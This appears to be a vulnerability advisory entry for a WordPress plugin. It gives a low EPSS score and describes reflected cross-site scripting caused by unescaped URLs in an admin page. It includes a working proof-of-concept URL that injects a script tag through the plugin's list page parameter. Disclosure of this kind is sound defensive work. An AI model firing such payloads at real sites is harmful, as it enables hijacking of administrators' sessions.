0.001 Low
EPSS
Percentile
43.5%
The plugin does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=hfcm-list&'><script>alert(/XSS/)</script>